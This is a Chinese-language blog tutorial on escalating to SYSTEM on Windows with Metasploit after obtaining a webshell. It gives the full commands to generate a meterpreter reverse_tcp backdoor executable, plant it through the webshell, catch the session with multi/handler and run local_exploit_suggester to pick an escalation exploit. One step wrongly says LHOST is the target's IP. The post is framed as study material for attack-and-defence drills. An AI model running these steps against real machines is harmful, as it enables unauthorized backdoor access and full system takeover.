windows提权--MSF全自动

本文详细指导如何在Linux上通过Metasploit创建反弹后门,监听会话,并利用exploit_suggester自动识别漏洞提权,适用于Windows系统攻防演练。
摘要由CSDN通过智能技术生成

免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等

目录

在linux上安装MSF

模拟场景:

1-生成反弹后门

2-配置监听会话

3-利用EXP提权


web--->system

拿到webshell后,我们通过MSF进行全自动的提权.

在linux上安装MSF

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 777 msfinstall
./msfinstall
msfconsole

模拟场景:

攻击机

靶机

--攻击机启动msf,生成后门(后面要反弹)(lhost为靶机ip地址,lport设置后别忘了.)

--攻击机 设置监听.(监听时 lhost 为0.0.0.0就行)

1-生成反弹后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=靶机IP LPORT=监听端口 -f exe -o msf.exe

(这里生成后门的端口 .        后面监听的时候也要保持一致!!!)
--将生成的后门放到网站的webshell,攻击机监听后运行一下.

2-配置监听会话

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0		--所有网关的某个端口都监听.
set lport 7788
run	--进行监听

--靶机 运行 上面生成的后门 进行反弹.

--上线

--查看权限,是Administrator权限

--进行提权,全自动化,

3-利用EXP提权

 

background
use post/multi/recon/local_exploit_suggester
set showdescription true
set session 1
run


#use post/windows/gather/enum_patches(半自动:根据漏洞编号找出系统中安装的补J)
#use post/multi/recon/local_exploit_suggester(全自动:快速识别系统中可能被利用的漏洞)

--产生能利用的模块,

--use一下,继续配置(lhost设置攻击机的)

--这里尽然生成了一个xxx.exe

--那我们就到其目录下,然后运行,最后查看权限.

--拿下windows的system权限~


评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值